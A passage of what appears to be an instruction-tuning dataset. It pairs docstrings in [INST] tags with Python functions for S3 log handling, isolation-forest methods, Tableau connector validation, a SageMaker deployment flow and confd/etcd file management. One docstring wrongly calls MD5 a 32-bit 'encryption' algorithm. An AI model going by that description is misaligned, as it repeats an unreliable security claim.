a socket error occurs. Make sure to set closed +and add the exception, and note an exception event.. [/INST] def on_error(self, exception): + args = [self._args['host'], self._args['port'], str(exception)] + if self._channels[0][0].open: + self._exceptions.put(exceptions.ConnectionResetException(*args)) + else: + self._exceptions.put(exceptions.ConnectionException(*args)) + self._events.set(events.EXCEPTION_RAISED) +[INST] Connect the socket to the specified host and port.. [/INST] def _connect_socket(self, sock, address): + LOGGER.debug('Connecting to %r', address) + sock.settimeout(self._args['timeout']) + sock.connect(address) +[INST] The handler for s3 CreateObject event and send the logs to Cloudwatch. [/INST] def handle_s3_logs(event, log_group, log_stream, log_format): + data = utils.parse_data(utils.unpack_data_from_s3(event), log_format) + cloud_watch = Cloudwatch(log_group, log_stream) + cloud_watch.send_logs(data) +[INST] The handler for s3 CreateObject event to extract akamai log file from email and upload. [/INST] def handle_s3_akamai_email(event, bucket, prefix=''): + data = utils.unpack_data_from_s3(event) + utils.extract_email_and_upload(data, bucket, prefix) +[INST] load object from s3 CreateObject event. [/INST] def unpack_data_from_s3(event): + bucket = event['Records'][0]['s3']['bucket']['name'] + key = event['Records'][0]['s3']['object']['key'] + print("Processing file s3://{}/{}".format(bucket, key)) + response = S3.get_object(Bucket=bucket, Key=key) + data = response['Body'].read() + if key[-3:] == '.gz': + data = gzip.decompress(data) + return data +[INST] parse data into json format logs. 
[/INST] def parse_data(data, log_format): + logs = [] + data = str(data, 'utf-8', errors='backslashreplace').splitlines() + result = csv.DictReader((row for row in data if not row.startswith('#')), + fieldnames=log_format, delimiter='\t') + for row in result: + date = row.pop('logdate') + time = row.pop('logtime') + log = { + 'message': json.dumps(row), + 'timestamp': int(datetime.strptime( + date + " " + time, '%Y-%m-%d %H:%M:%S').timestamp() * 1000) + } + logs.append(log) + logs.sort(key=lambda x: x['timestamp']) + return logs +[INST] Extract akamai LDS email data in gzip/mime type. [/INST] def extract_email_and_upload(data, bucket, prefix): + try: + msg = email.message_from_bytes(data) + filename = msg['subject'] + if not filename or not filename.endswith('.gzm'): + print("Invalid file, subject is: " + filename) + return 1 + regx = re.compile('.gzm\\b') + count = 0 + for part in msg.walk(): + decoded_filename = regx.sub(str(count) + '.gz', filename) + if part.get_content_maintype() == 'multipart': + continue + upload_objects_to_s3( + bucket, prefix + decoded_filename, part.get_payload(decode=True)) + count += 1 + return 0 + except Exception as err: + raise err +[INST] Loads address list and contact list in `__onload`. [/INST] def load_address_and_contact(**doc): + doc = json.loads(doc.get("doc")) + doc_type = doc.get("message").get("doctype") + doc_name = doc.get("message").get("name") + from frappe.contacts.doctype.address.address import get_address_display, get_condensed_address + filters = [ + ["Dynamic Link", "link_doctype", "=", doc_type], + ["Dynamic Link", "link_name", "=", doc_name], + ["Dynamic Link", "parenttype", "=", "Address"], + ] + address_list = frappe.get_all("Address", filters=filters, fields=["*"]) + address_list = [a.update({"display": get_address_display(a)}) + for a in address_list] + address_list = sorted(address_list, + key = functools.cmp_to_key(lambda a, b: + (int(a.is_primary_address - b.is_primary_address)) or + (1 if a.modified - b.modified else 0)), reverse=True) + contact_list = [] + filters = [ + ["Dynamic Link", "link_doctype", "=", doc_type], + ["Dynamic Link", "link_name", "=", doc_name], + ["Dynamic Link", "parenttype", "=", "Contact"], + ] + contact_list = frappe.get_all("Contact", filters=filters, fields=["*"]) + for contact in contact_list: + contact["email_ids"] = frappe.get_list("Contact Email", filters={ + "parenttype": "Contact", + "parent": contact.name, + "is_primary": 0 + }, fields=["email_id"]) + contact["phone_nos"] = frappe.get_list("Contact Phone", filters={ + "parenttype": "Contact", + "parent": contact.name, + "is_primary_phone": 0, + "is_primary_mobile_no": 0 + }, fields=["phone"]) + if contact.address: + address = frappe.get_doc("Address", contact.address) + contact["address"] = get_condensed_address(address) + contact_list = sorted(contact_list, + key = functools.cmp_to_key(lambda a, b: + (int(a.is_primary_contact - b.is_primary_contact)) or + (1 if a.modified - b.modified else 0)), reverse=True) + return {"address_list":address_list, "contact_list":contact_list} +[INST] Predict outlierness based on average isolation depth +Calculates the approximate depth that it takes to isolate an observation according to the +fitted model splits. Can output either the average depth, or a standardized outlier score +based on whether it takes more or fewer splits than average to isolate observations. 
In the +standardized outlier score metric, values closer to 1 indicate more outlierness, while values +closer to 0.5 indicate average outlierness, and close to 0 more averageness (harder to isolate). + +Note + +The more threads that are set for the model, the higher the memory requirements will be as each +thread will allocate an array with one entry per row. + +Note + +Predictions for sparse data will be much slower than for dense data. Not recommended to pass +sparse matrices unless they are too big to fit in memory. + +Note + +In order to save memory when fitting and serializing models, the functionality for outputting +terminal node number will generate index mappings on the fly for all tree nodes, even if passing only +1 row, so it's only recommended for batch predictions. + +Note + +The outlier scores/depth predict functionality is optimized for making predictions on one or a +few rows at a time - for making large batches of predictions, it might be faster to use the +'fit_predict' functionality. + +Parameters + +X : array or array-like (n_samples, n_features) +Observations for which to predict outlierness or average isolation depth. Can pass +a NumPy array, Pandas DataFrame, or SciPy sparse CSC or CSR matrix. + +Returns + +score : array(n_samples,) or array(n_samples, n_trees) +Requested output type for each row accoring to parameter 'output' (outlier scores, +average isolation depth, or terminal node indices).. [/INST] def predict(self, X, output = "score"): + assert self.is_fitted_ + assert output in ["score", "avg_depth", "tree_num"] + X_num, X_cat, nrows = self._process_data_new(X) + if output == "tree_num": + if self.missing_action == "divide": + raise ValueError("Cannot output tree number when using 'missing_action' = 'divide'.") + if self.new_categ_action == "weighted": + raise ValueError("Cannot output tree number when using 'new_categ_action' = 'weighted'.") + if nrows == 1: + warnings.warn("Predicting tree number is slow, not recommended to do for 1 row at a time.") + depths, tree_num = self._cpp_obj.predict(X_num, X_cat, self._is_extended_, + ctypes.c_size_t(nrows).value, + ctypes.c_int(self.nthreads).value, + ctypes.c_bool(output == "score").value, + ctypes.c_bool(output == "tree_num").value) + if output in ["score", "avg_depth"]: + return depths + else: + return tree_num +[INST] Appends isolation trees from another Isolation Forest model into this one +This function is intended for merging models **that use the same hyperparameters** but +were fitted to different subsets of data. + +In order for this to work, both models must have been fit to data in the same format +that is, same number of columns, same order of the columns, and same column types, although +not necessarily same object classes . + + + +Note + +This function will not perform any checks on the inputs, and passing two incompatible +models will result in wrong results and +potentially crashing the Python process when using it. + +Parameters + +other : IsolationForest +Another Isolation Forest model from which trees will be appended to this model. +It will not be modified during the call to this function. + +Returns + +self : obj +This object.. 
[/INST] def append_trees(self, other): + assert self.is_fitted_ + assert other.is_fitted_ + assert isinstance(other, IsolationForest) + if (self._is_extended_) != (other._is_extended_): + raise ValueError("Cannot mix extended and regular isolation forest models (ndim=1).") + if self.cols_categ_.shape[0]: + warnings.warn("Merging models with categorical features might give wrong results.") + self._cpp_obj.append_trees_from_other(other._cpp_obj, self._is_extended_) + self.ntrees += other.ntrees + return self +[INST] Export Isolation Forest model +Save Isolation Forest model to a serialized file along with its +metadata, in order to be re-used in Python or in the R or the C++ versions of this package. + +Although the model objects are always serializable through ``pickle``, this function +might provide a faster alternative and use less memory when the models to serialize are big. + +Note that, if the model was fitted to a ``DataFrame``, the column names must be +something exportable as JSON, and must be something that R could +use as column names . + +It is recommended to visually inspect the produced ``.metadata`` file in any case. + + + + + +The metadata will contain, among other things, the encoding that was used for +categorical columns - this is under ``data_info.cat_levels``, as an array of arrays by column, +with the first entry for each column corresponding to category 0, second to category 1, +and so on (the C++ version takes them as integers). + +The serialized file can be used in the C++ version by reading it as a binary raw file +and de-serializing its contents with the ``cereal`` library or using the provided C++ functions +for de-serialization. + +The metadata is not used in the C++ version, but is necessary for the R and Python versions. + +Note + +The model treats boolean variables as categorical. Thus, if the model was fit +to a ``DataFrame`` with boolean columns, when importing this model into C++, they need to be +encoded in the same order - e.g. + +Parameters + +file : str +The output file path into which to export the model. Must be a file name, not a +file handle. +use_cpp : bool +Whether to use C++ directly for IO. Using the C++ funcionality directly is faster, and +will write directly to a file instead of first creating the file contents in-memory, +but in Windows, if the library was compiled with a compiler other than MSVC, +file paths that contain non-ASCII characters will faill to write +and might crash the Python process along with it. If passing ``False``, it will at +first create the file contents in-memory in a Python object, and then use a Python +file handle to write such contents into a file. + +Returns + +self : obj +This object. + +References. [/INST] def export_model(self, file, use_cpp = True): + assert self.is_fitted_ + metadata = self._export_metadata() + with open(file + ".metadata", "w") as of: + json.dump(metadata, of, indent=4) + self._cpp_obj.serialize_obj(file, use_cpp, self.ndim > 1) + return self +[INST] Note + +Making predictions through SQL is much less efficient than from the model +itself, as each terminal node will have to check all of the conditions +that lead to it instead of passing observations down a tree. + +Note + +If constructed with the default arguments, the model will not perform any +sub-sampling, which can lead to very big trees. If it was fit to a large +dataset, the generated SQL might consist of gigabytes of text, and might +lay well beyond the character limit of commands accepted by SQL vendors. 
+ +Note + + + +Note + +The generated SQL statements will only include handling of missing values +when using ``missing_action="impute"``. + +Note + +The resulting statements will include all the tree conditions as-is, +with no simplification. Thus, there might be lots of redundant conditions +in a given terminal node . + +Parameters + +enclose : str +With which symbols to enclose the column names in the select statement +so as to make them SQL compatible in case they include characters like dots. +Options are. + + + + + +``"none"``: +Will output the column names as-is +output_tree_num : bool +Whether to make the statements return the terminal node number +instead of the isolation depth. The numeration will start at zero. +tree : int or None +Tree for which to generate SQL statements. If passed, will generate +the statements only for that single tree. If passing 'None', will +generate statements for all trees in the model. +table_from : str or None +If passing this, will generate a single select statement for the +outlier score from all trees, selecting the data from the table +name passed here. In this case, will always output the outlier +score, regardless of what is passed under ``output_tree_num``. +select_as : str +Alias to give to the generated outlier score in the select statement. +Ignored when not passing ``table_from``. +column_names : None or list[str] +Column names to use for the **numeric** columns. + +Returns + +sql : list[str] or str +A list of SQL statements for each tree as strings, or the SQL statement +for a single tree if passing 'tree', or a single select-from SQL statement +with all the trees concatenated if passing ``table_from``.. [/INST] def generate_sql(self, enclose="doublequotes", output_tree_num = False, tree = None, + table_from = None, select_as = "outlier_score", + column_names = None, column_names_categ = None): + assert self.is_fitted_ + single_tree = False + if tree is not None: + if isinstance(tree, float): + tree = int(tree) + assert isinstance(tree, int) + assert tree >= 0 + assert tree < self.ntrees + single_tree = True + else: + tree = 0 + output_tree_num = bool(output_tree_num) + if self._ncols_numeric: + if column_names is not None: + if len(column_names) != self._ncols_numeric: + raise ValueError("'column_names' must have %d entries." % self._ncols_numeric) + else: + if self.cols_numeric_.shape[0]: + column_names = self.cols_numeric_ + else: + column_names = ["column_" + str(cl) for cl in range(self._ncols_numeric)] + else: + column_names = [] + if self.cols_categ_.shape[0]: + if column_names_categ is not None: + if len(column_names_categ) != self.cols_categ_.shape[0]: + raise ValueError("'column_names_categ' must have %d entries." 
% self.cols_categ_.shape[0]) + else: + column_names_categ = self.cols_categ_ + categ_levels = [[str(lev) for lev in mp] for mp in self._cat_mapping] + else: + column_names_categ = [] + categ_levels = [] + assert enclose in ["doublequotes", "squarebraces", "none"] + if enclose != "none": + enclose_left = '"' if (enclose == "doublequotes") else '[' + enclose_right = '"' if (enclose == "doublequotes") else ']' + column_names = [enclose_left + cl + enclose_right for cl in column_names] + column_names_categ = [enclose_left + cl + enclose_right for cl in column_names_categ] + out = [s for s in self._cpp_obj.generate_sql(self.ndim > 1, + column_names, column_names_categ, categ_levels, + output_tree_num, single_tree, tree, self.nthreads)] + if single_tree: + return out[0] + return out +[INST] None + +list[ConnectorFile] -- list of files to package +Returns none if any of the files are invalid, or the files do not agree on the name. [/INST] def generate_file_list(self) -> Optional[List[ConnectorFile]]: + logging.debug("Generating list of files for validation and/or packaging...") + if not self.path_to_folder.is_dir(): + logger.error("Error: " + str(self.path_to_folder) + " does not exist or is not a directory.") + return None + path_to_manifest = self.path_to_folder / "manifest.xml" + if not path_to_manifest.is_file(): + logger.error("Error: " + str(self.path_to_folder) + " does not contain a file called manifest.xml.") + return None + self.file_list.append(ConnectorFile("manifest.xml", "manifest")) + files_valid = self.parse_file(self.file_list[0]) + if not files_valid: + return None + if not self.class_name: + logger.debug("Class name not found in files.") + return None + if len(self.loc_strings) > 0: + logger.debug("Found translatable strings, looking for resource files...") + logger.debug('Strings found:') + for s in self.loc_strings: + logger.debug("-- " + s) + for language in TABLEAU_SUPPORTED_LANGUAGES: + resource_file_name = "resources-" + language + ".xml" + path_to_resource = self.path_to_folder / Path(resource_file_name) + if path_to_resource.is_file(): + new_file = ConnectorFile(resource_file_name, "resource") + xml_violations_buffer = [] + if not validate_single_file(new_file, path_to_resource, xml_violations_buffer): + for error in xml_violations_buffer: + logging.debug(error) + return None + self.file_list.append(ConnectorFile(resource_file_name, "resource")) + logging.debug("Adding file to list (name = " + resource_file_name + ", type = resource)") + else: + logger.debug("No loc files.") + logger.debug("Generated file list:") + for f in self.file_list: + logger.debug("-- " + f.file_name) + return self.file_list +[INST] - True if parsing succeeds +Appends any new files found in this one to self.file_list and recursively calls parse_file on it +If any translatable strings are found, append it to self.loc_strings. 
[/INST] def parse_file(self, file_to_parse: ConnectorFile) -> bool: + path_to_file = self.path_to_folder / str(file_to_parse.file_name) + xml_violation_buffer = [] + if not validate_single_file(file_to_parse, path_to_file, xml_violation_buffer): + for v in xml_violation_buffer: + logger.debug(v) + return False + logger.debug("Parsing " + str(path_to_file)) + xml_tree = parse(str(path_to_file)) + root = xml_tree.getroot() + for child in root.iter(): + if 'file' in child.attrib: + new_file_path = str(self.path_to_folder / child.attrib['file']) + if not os.path.isfile(new_file_path): + logger.debug("Error: " + new_file_path + " does not exist but is referenced in " + + str(file_to_parse.file_name)) + return False + logging.debug("Adding file to list (name = " + child.attrib['file'] + ", type = " + child.tag + ")") + new_file = ConnectorFile(child.attrib['file'], child.tag) + already_in_list = new_file in self.file_list + self.file_list.append(new_file) + if child.tag != 'script' and not already_in_list: + children_valid = self.parse_file(new_file) + if not children_valid: + return False + if 'url' in child.attrib: + url_link = child.attrib['url'] + if not url_link.startswith(HTTPS_STRING): + logging.error("Error: Only HTTPS URL's are allowed. URL " + url_link + + " is a non-https link in file " + file_to_parse.file_name) + return False + if 'class' in child.attrib: + if not self.class_name: + logging.debug("Found class name: " + child.attrib['class']) + self.class_name = child.attrib['class'] + elif child.attrib['class'] != self.class_name: + logging.error("Error: class attribute in file " + file_to_parse.file_name + + " does not equal class attribute in manifest.") + logging.debug(self.class_name + " in manifest, " + child.attrib['class'] + " in " + + file_to_parse.file_name) + return False + for key, value in child.attrib.items(): + if value.startswith(TRANSLATABLE_STRING_PREFIX): + self.loc_strings.append(value) + return True +[INST] Read data in, and parallelize model building with two params (in this case, dummy example with learning rate).. [/INST] def start(self): + print("flow name: %s" % current.flow_name) + print("run id: %s" % current.run_id) + print("username: %s" % current.username) + raw_data = StringIO(self.DATA_FILE).readlines() + print("Total of {} rows in the dataset!".format(len(raw_data))) + self.dataset = [[float(_) for _ in d.strip().split('\t')] for d in raw_data] + print("Raw data: {}, cleaned data: {}".format(raw_data[0].strip(), self.dataset[0])) + split_index = int(len(self.dataset) * 0.8) + self.train_dataset = self.dataset[:split_index] + self.test_dataset = self.dataset[split_index:] + print("Training data: {}, test data: {}".format(len(self.train_dataset), len(self.test_dataset))) + self.learning_rates = [0.1, 0.2] + self.next(self.train_model, foreach='learning_rates') +[INST] Train a dummy regression model with Keras +and use high-performance s3 client from metaflow to store the model tar file for further processing.. 
[/INST] def train_model(self): + self.learning_rate = self.input + import tensorflow as tf + from tensorflow.keras import layers + import tarfile + x_train = np.array([[_[0]] for _ in self.train_dataset]) + y_train = np.array([_[1] for _ in self.train_dataset]) + x_test = np.array([[_[0]] for _ in self.test_dataset]) + y_test = np.array([_[1] for _ in self.test_dataset]) + x_model = tf.keras.Sequential([ + layers.Dense(input_shape=[1,], units=1) + ]) + print(x_model.summary()) + x_model.compile( + optimizer=tf.optimizers.Adam(learning_rate=self.learning_rate), + loss='mean_absolute_error') + history = x_model.fit(x_train, y_train,epochs=100, validation_split=0.2) + self.hist = history.history + self.results = x_model.evaluate(x_test, y_test) + print("Test set results: {}".format(self.results)) + model_name = "regression-model-{}/1".format(self.learning_rate) + local_tar_name = 'model-{}.tar.gz'.format(self.learning_rate) + x_model.save(filepath=model_name) + with tarfile.open(local_tar_name, mode="w:gz") as _tar: + _tar.add(model_name, recursive=True) + with open(local_tar_name, "rb") as in_file: + data = in_file.read() + with S3(run=self) as s3: + url = s3.put(local_tar_name, data) + print("Model saved at: {}".format(url)) + self.s3_path = url + self.next(self.join_runs) +[INST] Join the parallel runs and merge results into a dictionary.. [/INST] def join_runs(self, inputs): + self.results_from_runs = { + inp.learning_rate: + { + 'metrics': inp.results, + 'tar': inp.s3_path + } + for inp in inputs} + print("Current results: {}".format(self.results_from_runs)) + self.best_learning_rate = choice(list(self.results_from_runs.keys())) + self.best_s3_model_path = self.results_from_runs[self.best_learning_rate]['tar'] + self.next(self.deploy) +[INST] Use SageMaker to deploy the model as a stand-alone, PaaS endpoint, with our choice of the underlying +Docker image and hardware capabilities. + + + +Once the endpoint is deployed, you can add a further step with for example behavioral testing, to +ensure model robustness . Here, we just "prove" that +the endpoint is up and running!. [/INST] def deploy(self): + from sagemaker.tensorflow import TensorFlowModel + ENDPOINT_NAME = 'regression-{}-endpoint'.format(int(round(time.time() * 1000))) + print("\n\n================\nEndpoint name is: {}\n\n".format(ENDPOINT_NAME)) + model = TensorFlowModel( + model_data=self.best_s3_model_path, + image_uri=self.DOCKER_IMAGE_URI, + role=self.IAM_SAGEMAKER_ROLE) + predictor = model.deploy( + initial_instance_count=1, + instance_type=self.SAGEMAKER_INSTANCE, + endpoint_name=ENDPOINT_NAME) + input = {'instances': np.array([[0.57457947234]])} + result = predictor.predict(input) + print(input, result) + assert result['predictions'][0][0] > 0 + self.next(self.end) +[INST] The final step is empty here, but cleaning operations and/or sending hooks for downstream deployment tasks +is a natural necessity for machine learning DAGs.. [/INST] def end(self): + print('Dag ended!') +[INST] AWS lambda function, to handle incoming GET requests asking our model for predictions.. 
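The handler below relies on two helpers that are not part of this excerpt (get_response_from_sagemaker and wrap_response). A plausible sketch of the response-wrapping half, assuming the standard API Gateway Lambda proxy contract, could look like this (purely illustrative, not the project's actual helper):

import json

def wrap_response(status_code: int, body: dict) -> dict:
    # Shape a dict into the API Gateway Lambda proxy response format.
    return {
        'statusCode': status_code,
        'headers': {'Content-Type': 'application/json'},
        'body': json.dumps(body),
    }

# Example: wrap_response(200, {'prediction': 0.42, 'time': 0.05})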
[/INST] def predict(event, context): + print("Received event: " + json.dumps(event)) + params = event['queryStringParameters'] + response = dict() + start = time.time() + input_payload = { 'instances': [[float(params.get('x', '0.0'))]] } + result = get_response_from_sagemaker(json.dumps(input_payload), + SAGEMAKER_ENDPOINT_NAME, + content_type='application/json') + if result: + print(result) + response = result['predictions'][0][0] + return wrap_response(status_code=200, body={ + "prediction": response, + "time": time.time() - start, + "endpoint": SAGEMAKER_ENDPOINT_NAME + }) +[INST] use md5 encryption algorithm to generate a 32bit hex code.. [/INST] def md5hex(text): + if isinstance(text, unicode): + text = text.encode('utf-8') + elif not isinstance(text, str): + text = str(text) + m = hashlib.md5() + m.update(text) + return m.hexdigest() +[INST] backup old toml/tmpl/cfg files from remote confd client to server. [/INST] def backup_files(self): + for host in self._hosts: + toml_bak = os.path.join(self._l_toml_bak, host) + tmpl_bak = os.path.join(self._l_tmpl_bak, host) + conf_bak = os.path.join(self._l_conf_bak, host) + remove_folder(toml_bak) + remove_folder(tmpl_bak) + remove_folder(conf_bak) + get_folder(toml_bak) + get_folder(tmpl_bak) + get_folder(conf_bak) + toml_pre = '%s/' % os.path.join('toml', self._folder_pre, host) + tmpl_pre = '%s/' % os.path.join('tmpl', self._folder_pre, host) + conf_pre = '%s/' % os.path.join('conf', self._folder_pre, host) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=toml_pre, recursive=False) + for x in objs: + self.minio.remove_object( + bucket_name=self._minio_bucket, + object_name=x.object_name.encode('utf-8')) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=tmpl_pre, recursive=False) + for x in objs: + self.minio.remove_object( + bucket_name=self._minio_bucket, + object_name=x.object_name.encode('utf-8')) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=conf_pre, recursive=False) + for x in objs: + self.minio.remove_object( + bucket_name=self._minio_bucket, + object_name=x.object_name.encode('utf-8')) + aapi = Ansible2API(hosts=[host], **self._ansible_kwargs) + tomls = self.get_tomls(host=host) + for x in tomls: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='fetch', + args=dict( + dest='%s/' % toml_bak, + src=os.path.join(self._r_toml, x), + flat='yes')) + msg = 'Toml File Backup: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Toml File Backup: %s' % results + app.logger.info(logmsg(msg)) + self.minio.fput_object( + bucket_name=self._minio_bucket, + object_name=os.path.join(toml_pre, x), + file_path=os.path.join(toml_bak, x)) + tmpls = self.get_tmpls(host=host) + for x in tmpls: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='fetch', + args=dict( + dest='%s/' % tmpl_bak, + src=os.path.join(self._r_tmpl, self._folder_pre, x), + flat='yes')) + msg = 'Tmpl File Backup: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Tmpl File Backup: %s' % results + app.logger.info(logmsg(msg)) + self.minio.fput_object( + bucket_name=self._minio_bucket, + object_name=os.path.join(tmpl_pre, x), + file_path=os.path.join(tmpl_bak, x)) + for x in self._files: + src = os.path.join(x['dir'], x['name']) + file_name = '%s%s%s' % ( + '@@'.join([x['mode'], x['owner']['name'], x['owner']['group']]), + self._broken_word_2, + src.replace('/', self._broken_word_1)) + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='fetch', + 
args=dict( + dest=os.path.join(conf_bak, file_name), + src=src, flat='yes')) + msg = 'Conf File Backup: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Conf File Backup: %s' % results + app.logger.info(logmsg(msg)) + file_path = os.path.join(conf_bak, file_name) + if os.path.isfile(file_path): + self.minio.fput_object( + bucket_name=self._minio_bucket, + object_name=os.path.join(conf_pre, file_name), + file_path=file_path) + objs = [os.path.basename(x.object_name.encode('utf-8')) for x in + self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=toml_pre, + recursive=False)] + for x in tomls: + if x not in objs: + raise Exception('Toml Backup Failed: %s.' % x) + objs = [os.path.basename(x.object_name.encode('utf-8')) for x in + self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=tmpl_pre, + recursive=False)] + for x in tmpls: + if x not in objs: + raise Exception('Tmpl Backup Failed: %s.' % x) +[INST] backup configuration keys using etcd server. [/INST] def backup_keys(self): + dir_pre = os.path.join('/', self._key_bak_pre, self._folder_pre) + if dir_pre in self.etcd: + self.etcd.delete(key=dir_pre, dir=True, recursive=True) + for x in self._files: + items = self.get_keys(cfg_name=x['name']) + for k, v in items.items(): + ret = self.etcd.write( + key=os.path.join(dir_pre, x['name'], k), value=v) + msg = 'Etcd Key Backup: %s.' % ret + app.logger.info(logmsg(msg)) +[INST] update configuration keys stored in etcd server +ps: when called for rollback, would delete keys totally new. [/INST] def update_keys(self, rollback=False): + for x in self._files: + items = (self.get_keys(cfg_name=x['name'], rollback=rollback) + if rollback else x['items']) + diff = set(x['items'].keys()).difference(set(items.keys())) + for k in diff: + key = os.path.join('/', self._folder_pre, x['name'], k) + if key in self.etcd: + ret = self.etcd.delete(key=key) + msg = 'Etcd Key Deleted: %s.' % ret + app.logger.info(logmsg(msg)) + for k, v in items.items(): + ret = self.etcd.write( + key=os.path.join('/', self._folder_pre, x['name'], k), + value=v) + msg = 'Etcd Key Updated: %s.' % ret + app.logger.info(logmsg(msg)) +[INST] delete expired configuration keys stored in etcd server. [/INST] def delete_expired_keys(self): + for x in self._files: + key_pre = os.path.join('/', self._folder_pre, x['name']) + if key_pre in self.etcd: + father = self.etcd.read(key=key_pre) + if hasattr(father, '_children'): + for y in father._children: + if y['key'].split('/')[-1] not in x['items'].keys(): + ret = self.etcd.delete(key=y['key']) + msg = 'Etcd Key Deleted: %s.' % ret + app.logger.info(logmsg(msg)) +[INST] delete expired toml/tmpl files in remote confd client. 
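The expiry check in the function below recovers a config name from a generated toml file name and compares it against the configured names. In isolation, that string manipulation looks roughly like this (the prefix value and the exact split token are illustrative):

FILE_PRE = 'myapp'  # hypothetical stand-in for self._file_pre

def toml_to_config_name(toml_name: str) -> str:
    # 'myapp.nginx.conf.toml' -> 'nginx.conf'
    return toml_name.split(FILE_PRE, 1)[1].split('.toml')[0].strip('.')

expected = {'nginx.conf', 'redis.conf'}
for name in ['myapp.nginx.conf.toml', 'myapp.stale.conf.toml']:
    if toml_to_config_name(name) not in expected:
        print('expired:', name)  # this file would be removed on the remote host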
[/INST] def delete_expired_files(self): + cfg_names = [x['name'] for x in self._files] + for host in self._hosts: + aapi = Ansible2API(hosts=[host], **self._ansible_kwargs) + tomls = self.get_tomls(host=host) + for x in tomls: + config = x.split(self._file_pre)[1].split('toml')[0].strip('.') + if config not in cfg_names: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='file', + args=dict( + path=os.path.join(self._r_toml, x), + state='absent')) + msg = 'Toml File Deleted: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Toml File Deleted: %s' % results + app.logger.info(logmsg(msg)) + tmpls = self.get_tmpls(host=host) + for x in tmpls: + config = x.split('.tmpl')[0] + if config not in cfg_names: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='file', + args=dict( + path=os.path.join( + self._r_tmpl, self._folder_pre, x), + state='absent')) + msg = 'Tmpl File Deleted: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Tmpl File Deleted: %s' % results + app.logger.info(logmsg(msg)) +[INST] delete old toml/tmpl files in remote confd client +ps: make sure that all these files have been backup already. [/INST] def delete_files(self): + for host in self._hosts: + aapi = Ansible2API(hosts=[host], **self._ansible_kwargs) + tomls = self.get_tomls(host=host) + for x in tomls: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='file', + args=dict( + path=os.path.join(self._r_toml, x), + state='absent')) + msg = 'Toml File Deleted: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Toml File Deleted: %s' % results + app.logger.info(logmsg(msg)) + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='file', + args=dict( + path='%s/' % os.path.join( + self._r_tmpl, self._folder_pre), + state='absent')) + msg = 'Tmpl File Deleted: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Tmpl File Deleted: %s' % results + app.logger.info(logmsg(msg)) + for x in self._files: + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='file', + args=dict( + path=os.path.join(x['dir'], x['name']), + state='absent')) + msg = 'Conf File Deleted: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Conf File Deleted: %s' % results + app.logger.info(logmsg(msg)) +[INST] update toml/tmpl/(conf) files to remote/local confd client. 
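Both the backup above and the restore below flatten each managed file's mode, owner and absolute path into a single object name, joined by two separator tokens (self._broken_word_1 / self._broken_word_2). A minimal round trip of that naming scheme, with hypothetical placeholder tokens:

PATH_SEP = '__SLASH__'   # stands in for self._broken_word_1
META_SEP = '__META__'    # stands in for self._broken_word_2

def encode_name(mode: str, owner: str, group: str, src_path: str) -> str:
    # '0644@@root@@root' + META_SEP + path with '/' replaced by PATH_SEP
    return '@@'.join([mode, owner, group]) + META_SEP + src_path.replace('/', PATH_SEP)

def decode_name(name: str):
    meta, flat_path = name.split(META_SEP)
    mode, owner, group = meta.split('@@')
    return mode, owner, group, flat_path.replace(PATH_SEP, '/')

name = encode_name('0644', 'root', 'root', '/etc/nginx/nginx.conf')
assert decode_name(name) == ('0644', 'root', 'root', '/etc/nginx/nginx.conf')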
[/INST] def push_files(self, rollback=False): + for host in self._hosts: + aapi = Ansible2API(hosts=[host], **self._ansible_kwargs) + toml_folder = '%s/' % ( + os.path.join(self._l_toml_bak, host) + if rollback else os.path.join(self._l_toml, host)) + tmpl_folder = '{}/'.format( + os.path.join(self._l_tmpl_bak, host) + if rollback else self._l_tmpl) + if rollback: + conf_folder = '%s/' % os.path.join(self._l_conf_bak, host) + remove_folder(toml_folder) + remove_folder(tmpl_folder) + remove_folder(conf_folder) + get_folder(toml_folder) + get_folder(tmpl_folder) + get_folder(conf_folder) + toml_pre = '%s/' % os.path.join('toml', self._folder_pre, host) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=toml_pre, recursive=False) + for x in objs: + object_name = x.object_name.encode('utf-8') + self.minio.fget_object( + bucket_name=self._minio_bucket, + object_name=object_name, + file_path=os.path.join( + toml_folder, os.path.basename(object_name))) + tmpl_pre = '%s/' % os.path.join('tmpl', self._folder_pre, host) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=tmpl_pre, recursive=False) + for x in objs: + object_name = x.object_name.encode('utf-8') + self.minio.fget_object( + bucket_name=self._minio_bucket, + object_name=object_name, + file_path=os.path.join( + tmpl_folder, os.path.basename(object_name))) + conf_pre = '%s/' % os.path.join('conf', self._folder_pre, host) + objs = self.minio.list_objects( + bucket_name=self._minio_bucket, prefix=conf_pre, recursive=False) + for x in objs: + object_name = x.object_name.encode('utf-8') + self.minio.fget_object( + bucket_name=self._minio_bucket, + object_name=object_name, + file_path=os.path.join( + conf_folder, os.path.basename(object_name))) + for x in os.listdir(conf_folder): + config = x.split(self._broken_word_2) + file_path = config[1].replace(self._broken_word_1, '/') + info = config[0].split('@@') + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='copy', + args=dict( + mode=info[0], + src=os.path.join(conf_folder, x), + dest=file_path, + group=info[2], + owner=info[1])) + msg = 'Conf File Updated: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Conf File Updated: %s' % results + app.logger.info(logmsg(msg)) + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='copy', + args=dict( + mode=self._confd_file_mode, + src=toml_folder, + 